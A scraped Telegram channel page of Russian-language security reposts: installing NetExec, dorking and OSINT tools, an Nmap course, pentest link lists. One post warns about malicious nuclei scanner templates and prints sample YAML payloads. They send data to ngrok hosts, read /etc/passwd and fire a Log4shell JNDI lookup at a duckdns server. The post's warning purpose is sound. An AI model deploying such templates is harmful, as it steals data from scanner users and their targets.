ch
Feedback
Fsecurity | HH

Fsecurity | HH

前往频道在 Telegram

Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb

显示更多
2 010
订阅者
无数据24 小时
+17
-530
帖子存档
Ещё немного про CrackMapExec👾 Упоминание которого было выше. [ЧИТАТЬ]📖

sticker.webp0.17 KB

Repost from SecuriXy.kz
CrackMapExec - все... переходим на NetExec Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Exec
+1
CrackMapExec - все... переходим на NetExec Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др https://www.netexec.wiki Ставиться проще простого через pipx

apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
Запускается тоже просто
NetExec
nxc
nxcdb
netexec

nxcdb
Для простоты восприятия можете добавить ~/.zshrc

alias cme=netexec
alias crackmapexec=netexec

🌐В этом нам поможет OSINT проект, который в автоматическом режиме позволяет найти на веб-сайте популярные админ-панели, уязвимые страницы, распространенные типы файлов и многое другое: https://github.com/IvanGlinkin/Fast-Google-Dorks-Scan • Демонстрация инструмента доступна на сайте автора: https://www.ivanglinkin.com/fast-google-dorks-scan/

Repost from infosec
👁 Курс: Этичный хакинг с Nmap. Часть 1: • Установка Nmap и настройка облачной лаборатории; • Основы Nmap, спецификация целей и состояния портов; • Обнаружение хостов / пинг сканирование; • Техники сканирования Nmap; • Спецификация портов, обнаружение служб, версий и операционной системы. Часть 2. • Скриптовый движок Nmap (NSE); • Производительность Nmap, обход файрволов и IDS; • Выходные данные Nmap и прочие опции; • Zenmap; • Как злоумышленники используют Nmap в C&C-инфраструктурах. ➡️ https://youtu.be/7HVhNCdmOKI #Nmap #Курс

Repost from N/a
👋Привет! На связи Ximera-Chan🎧 OSINT VM (Open Source Intelligence Virtual Machine) - это виртуальная машина, предназначенная для работы в области открытого исследования источников информации (OSINT). Она предоставляет набор инструментов и программного обеспечения, специально подобранных для сбора, анализа и обработки открытых данных из различных источников. Операционная система OSINT VM обычно основана на популярных дистрибутивах Linux, таких как Kali Linux или Ubuntu, и включает в себя специализированные инструменты для сбора информации из открытых источников, таких как социальные сети, интернет-форумы, новостные сайты и другие публичные ресурсы. OSINT VM обеспечивает удобную и готовую к использованию среду для специалистов по OSINT, и позволяет им эффективно выполнять свои задачи по сбору и анализу информации из различных источников. P.s. могут быть ошибки... Генерация Ai [Ximera-Chan]

Этот репозиторий представляет из себя коллекцию ресурсов для тестирования на проникновение и наступательных инструментов кибербезопасности. 🔗Ссылка: https://github.com/enaqx/awesome-pentest

Хочу также посоветовать: 1 - Проверить себя на утечки! 💧 2 - Наш discord сервер! Где можно пообщаться 👾 3 - Мой Github 🦑 4 - Новый ТГ канал [Ximera-Chan] который ведёт Ai

Repost from Blue (h/c)at Café
⚠️ Небезопасные сканеры безопасности Сегодня речь пойдет про сканеры безопасности. Как неожиданно, но довольно интересно. Обычно, это они же нам помогают искать уязвимости и зарабатывать деньги репутацию на багбаунти. О каких opensource сканерах мы знаем? Ну... там nuclei, ZAP, может что-то менее известное, например arachni (продались, а движок был интересный, в своё время) или же jaeles, который схож темплейтами с nuclei. А может никому не известный Artemis, да, он тоже работает с темплейтами. Тёмная сторона сканеров или как ваши таргеты летят другим людям Вот вроде бы всё замечательно со сканерами работающими на темплейтах. Легко добавлять новые CVE и POC, легко управлять сканированием используя теги. Даже комьюнити развивает и пишет что-то своё для себя и в GitHub. А только ли ради сообщества это делают? Возможно, но не все. Не одной CVE едины. Стоит вспомнить CVE-2021-21224, которая позволяла получить RCE через темплейт nuclei можете попробовать установив старую версию (исключительно в образовательных целях). Благо с выходом версии nuclei 3.0 code-based можно запускать только с использованием -code и только подписанные. А что с другими сканерами... пока не ясно А что сейчас могут подсунуть? 👉 SSRF
requests:
  - method: GET
    path:
      - "http://127.0.0.1:1337/flag"
      - "http://111111111111.ngrok.io/{{base64(output)}}"
    extractors:
      - type: regex
        name: output
        part: body
        internal: true
👉 Local File Read
requests:
  - method: GET
    payloads:
      passwd: /etc/passwd
    path:
      - "https://111111111111.ngrok.io/{{passwd}}"
👉 Перехват Log4shell (реальный пример)
requests:
  - raw:
      - |+
        GET / HTTP/1.1
        {{header}}: ${jndi:ldap://labdalab.duckdns.org:4567/a}
    payloads:
      header:
        - User-Agent
Вот и думайте, когда запускаете nuclei-подобные сканеры. Используйте только проверенные, самописные или находящиеся на этапе валидации. 🎁 Ниже представлен инструмент для скачивания легитимных, но пока ещё не валидированных темплейтов (спасибо @reewardiwe). 💻 GitHub - Ссылка
📌 НЕ ИСПОЛЬЗУЙТЕ cent и подобные парсеры гита для обогащения базы.
#redteam

Anti-Adblock-Killer Инструмент, который помогает вам поддерживать активность вашего блокировщика рекламы, когда вы посещаете
Anti-Adblock-Killer Инструмент, который помогает вам поддерживать активность вашего блокировщика рекламы, когда вы посещаете веб-сайт, и он просит вас отключить его Ссылка на GitHub Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint #рекомендация #рекомендации

Всем привет 👋 На связи Хаскарь 👾 На Ютуб канале наша численность перевалило за 1000 ⚠️ Огромное вам спасибо! Желаю вам: здоровья, счастья, успехов! Также всех с наступающим новым годом!⛄ (Наверное ещё рано, но все равно) Надеюсь, что он будет легче 🦑 Ещё раз спасибо всем за подписку и то, что остаётесь со мной! На связи был Хаскарь, до связи! 🎧 P.s. я продолжаю болеть, надеюсь скоро увидимся 😷